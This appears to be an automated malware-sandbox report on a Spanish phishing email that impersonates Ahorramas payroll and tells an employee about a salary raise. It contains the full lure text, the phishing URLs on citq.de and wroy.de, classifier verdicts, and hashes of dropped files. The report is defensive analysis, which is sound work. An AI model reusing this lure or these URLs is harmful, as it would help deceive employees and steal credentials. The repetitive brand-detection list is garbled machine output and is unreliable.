.message-id { color: #c0c0c0; font-size: 10px; } Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. La identidad de este remitente est confirmada por la lista de remitentes de confianza. La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO REVISAR DOCUMENTO https://tDmmV2467vEngTBHl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre ahorramas.com/Aumento-Salarial-Noviembre https://tDmmV2467vEngTBHl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Message ID: vEngTBHl3e69837tDmmV7099446787"
    ], 
    "from": "Administrador Ahorramas <Billing.kfil@denasabuildcon.com>", 
    "to": "fernando.batuecas@ahorramas.com", 
    "attachements": []
}
                                    URL: Email Model: Joe Sandbox AI
                                    ```json
{
  "contains_trigger_text": true,
  "trigger_text": "REVISAR DOCUMENTO",
  "prominent_button_name": "unknown",
  "text_input_field_labels": [
    "Documento Recibido",
    "Departamento de Recursos Humanos"
  ],
  "pdf_icon_visible": true,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false
}
                                    URL: Email Model: Joe Sandbox AI
                                    ```json
{
  "brands": [
    "ACIAPC",
    "ADOALG",
    "ADOALG-en",
    "ADOALG-PDF",
    "ADOALG-viewport",
    "ADOALG-width",
    "ADOALG-width-initial-scale",
    "ADOALG-width-scale",
    "ADOALG-width-scale-1.0",
    "ADOALG-width-scale-ACIAPC",
    "ADOALG-width-scale-ADOALG",
    "ADOALG-width-scale-ADOALG-container",
    "ADOALG-width-scale-ADOALG-header",
    "ADOALG-width-scale-ADOALG-table",
    "ADOALG-width-scale-ADOALG-title",
    "ADOALG-width-scale-ADOALG-tr",
    "ADOALG-width-scale-ADOALG-width",
    "ADOALG-width-scale-ADOALG-width-initial-scale",
    "ADOALG-width-scale-ADOALG-width-scale",
    "ADOALG-width-scale-ADOALG-width-scale-1.0",
    "ADOALG-width-scale-ADOALG-width-scale-ACIAPC",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-container",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-header",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-table",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-title",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-tr",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-width",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-width-initial-scale",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-width-scale",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-width-scale-1.0",
    "ADOALG-width-scale-ADOALG-width-scale-ACIAPC",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-container",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-header",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-table",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-title",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-tr",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-width",
    "ADOALG-width-scale-ADOALG-width-scale-ADOALG-width-initial-scale",
    "ADOALG-width-scale-ADOALG-width
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json
{
  "contains_trigger_text": true,
  "trigger_text": "We need to verify your security before Previewing this document.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": true,
  "has_visible_qrcode": false
}
                                    URL: https://tdmmv2467vengtbhl3e.citq.de Model: Joe Sandbox AI
                                    {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}
                                    URL: https://tdmmv2467vengtbhl3e.citq.de
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json
{
  "contains_trigger_text": true,
  "trigger_text": "We need to verify your security before Previewing this document.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": true,
  "has_visible_qrcode": false
}
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json
{
  "brands": [
    "AhorrasMas"
  ]
}
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json
{
  "brands": [
    "Ahorra Mas"
  ]
}
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json{  "legit_domain": "ahorramas.com",  "classification": "known",  "reasons": [    "The brand 'AhorrasMas' is a known brand, likely associated with the domain 'ahorramas.com'.",    "The provided URL 'tdmmv2467vengtbhl3e.citq.de' does not match the legitimate domain for AhorrasMas.",    "The URL contains a random string and a different domain extension '.de', which is not typically associated with AhorrasMas.",    "The presence of a subdomain with random characters is a common tactic used in phishing attempts.",    "The input fields labeled as 'unknown' suggest a lack of clear purpose, which is suspicious."  ],  "riskscore": 9}
Google indexed: False
                                    URL: tdmmv2467vengtbhl3e.citq.de
            Brands: AhorrasMas
            Input Fields: u, n, k, n, o, w, n
                                    URL: https://ahorramas-5ocglii6fvrlmr.wroy.de Model: Joe Sandbox AI
                                    {
    "typosquatting": true,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": true,
    "third_party_hosting": true
}
                                    URL: https://ahorramas-5ocglii6fvrlmr.wroy.de
                                    URL: https://wroy.de Model: Joe Sandbox AI
                                    {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}
                                    URL: https://wroy.de

                                    Created / dropped Files

                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):338
                                    Entropy (8bit):3.4535923149457752
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8D162B02FFDA8D8642A0859FBBCAAE1F
                                    SHA1:6601F0BAB93AFAD613FCEE940F94E834A48EA5D2
                                    SHA-256:4ED92E3E335B7E3356346672650FEDC182CC7B271BFA22774DACA817A2ADA2B1
                                    SHA-512:A07A880C5A27A20C2A4A5BD3AE2A09F0CCC469F03B34F5202F0B296F66D2C4D31C1FEFFFB2E8213623B3D7EDFD624517B0C1EDAE1DC6FF11E610E33BD096E88D
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:p...... ........E..7E7..(..................................................^SZ.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                    C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):231348
                                    Entropy (8bit):4.385181381343066
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:1E53810E06C6DEB9DCD945BB7E687231
                                    SHA1:DBB0973AD1F8A15EF0D6729EB33AAEEA9964C8CC
                                    SHA-256:60C542FC33E375DE053E3AB02055CDF7466CB769E432144BA709D3CBA7C46A0D
                                    SHA-512:95124D0A7C7EA6231439CD06A04BAE50B6F568C0735125B5B7049C669225F6CC66752F40E3A1FBFD5F8931000553623618779C2C2AE4A8662EFBB333F086385D
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:TH02...... ..U.+E7......SM01X...,......+E7..........IPM.Activity...........h...............h............H..h\.o............h............H..h\cal ...pDat...h`...0.....o....h.c............h........_`Pk...h..c.@...I.lw...h....H...8.Uk...0....T...............d.........2h...............k..............!h.............. h]..N.....o...#h....8.........$h........8....."h. .......!....'h..............1h.c.<.........0h....4....Uk../h....h.....UkH..hh`..p...\.o...-h .........o...+hC.c....P.o................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6BFC1919-4488-4771-AEB6-547BA7FCC1F2

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):180288
                                    Entropy (8bit):5.290995299950785
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8707E8AB51FD378997188DE42F158B47
                                    SHA1:2C5EBBC2F796C35F45145F06211D01DBCF099321
                                    SHA-256:9002CF909D7559DFFF2DC17A83F795FCA5392D68CE1F8DCDB0C8379CF81B93D2
                                    SHA-512:F9DEDE4440C922E691669AB5BB47D5B90F0E27A821C9BEBF53062AF34B16C40D47654430A23EAB4BAB5D9B681C3558A7E815F3D93C29B3FE8C9E7CD5D6629EFD
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-11-15T10:00:34">.. Build: 16.0.18223.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

                                    C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:SQLite Rollback Journal
                                    Category:dropped
                                    Size (bytes):4616
                                    Entropy (8bit):0.13760166725504608
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B48807C3065F5F541F96A460A9D25B07
                                    SHA1:A6C6536CD3608F1481500CE26830E76779F5FAE4
                                    SHA-256:1EBD2312D7380D00A38BE0114A63119032F106F0C507ACB158428B0EE8BF4527
                                    SHA-512:C8B83573BE99827190B268F61403EE4BF0AF25E8F89809A2B06414BF6BA3560326F86D847322DACDF5FDB930F8C03815D50F424F011813E549CE7DE79BD69016
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:.... .c.....O-.Y....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):1.2389205950315936
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:3C67B369BC979AF6F44281C10D0ABB0F
                                    SHA1:C97C9BAED90B5576976D4E63668A390B3B02A53E
                                    SHA-256:836CEBAA2E9EF3BD21EBD93495C3F0FB494231551ED1290519F122AAD99C7FCE
                                    SHA-512:08C57553B2E662EB2DF5306E16D880E10B490F2455EDC60B96CA4DE9F12F655135835B0E008D5DB4115F2961058006F5607050D12D2752D95AD9D889F4B4B5FB
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:..............................

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2673
                                    Entropy (8bit):3.9759771744945693
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A1BD029E680689CA67C5BE3749E59DC8
                                    SHA1:6C1113DBA3E0AA729E65E7F2CDDB032F84E25DD0
                                    SHA-256:E38ECBAB2FCF849F8DB344BC05BB5C30ADD3BA42629D3DBBAF56866EE789721B
                                    SHA-512:FDFB668E131555A788FCEE3C8AA929D0BB2551AC33D90608E30CD7AD73CF82D3192A7C591906037EDA920DD658421B22F61B5B99BD715E05E275DC00F840333F
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,......y=E7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2675
                                    Entropy (8bit):3.9904427738079566
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:2228DD54F24BBEC3F0CF58333F0D5789
                                    SHA1:8CCD323FC25B9B2BC667935A6620A62BEFFC6B7D
                                    SHA-256:1A985D737319AB8B1B24764C704D12F47B9EECFB923817C5084D11D3F07CEAE1
                                    SHA-512:36F92DEF1115D3CD52BC324CF581C1A3930955183D7E52F03A4AC71713F8C02FC37853933D7257692ADA6055CFB73255DF162D6098BA959D7E82380A3473150A
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,....P.l=E7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2689
                                    Entropy (8bit):4.001659778384124
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9F8C8A6524C3791FA7FE353D56FC3EE7
                                    SHA1:B04E2F195092D3FDFB0B2E0D5B152031DF458B6F
                                    SHA-256:8D675A2817199E3A2FFD22732BD9E028F80193613F61F3ABCB4D039596F7F45F
                                    SHA-512:48287F927BA4870E0C2421C734E6B8B46666D2D5B75386417A79B0AA58C57146A272EC9185B3AD2C764C3AB1FB4715508D883824FCB0E00BCF8A9ED67DC1109D
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.9892604617751926
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:009B36EDE61D3F70854FB8E6F23767CF
                                    SHA1:84D0A8E992C309F7D8FD2AC8D2230F961F4038AD
                                    SHA-256:E94AE0DC7FB0B53F4E765F1A4FB17077D07B23C6758A74DD51A6A22925713B39
                                    SHA-512:D208CAC3F8F24228AF561412F385F4854C95522DDE49CE79A5D8DE266D7AA885EC109719C3029E88D7B8C63F5E3DF6CFA4CAABE17FF67C05C131C7AF812C00CC
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,.....f=E7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:46 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.9774876794883456
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:48CCD180DBAA3334D18C8BCE9860A08F
                                    SHA1:AE962F6E90419714C8EA1AD00C5430A9DADA8D1D
                                    SHA-256:1A59B2C4C34FE512E2D0EF97523E2692FBDBC8FBE1BCD6A4E670F2370DA4C7BA
                                    SHA-512:472D2665D606444061FF613637A50F9A3A583322C311014A21D30E0A1E3BE1EC0505A974955CF4FAA2CE0EBAEDE36CB210CBA5977FD1DCCC1A46C0D8C255638F
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,......s=E7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                    Download File
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 09:00:45 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2679
                                    Entropy (8bit):3.9850798521505872
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:87FAE11ED94BBE7F75CBE14F634D85B8
                                    SHA1:9F1F977E33CF97FB5FDBE79924E42482E2B3E82B
                                    SHA-256:E302CD80D3A9F5AA819893237D8655DB4DF686EF6F8FC0D1C248CE4B2FA4D9AA
                                    SHA-512:280C9F34D9A92A2D50B5098213A44FB35FE730D7CD757E9223BAFAE02B0CF4291F163E4F165FEAEC110A28C2F5E08C4D1336A22D945556DACED76C796A4E6D69
                                    Malicious:false
                                    Reputation:unknown
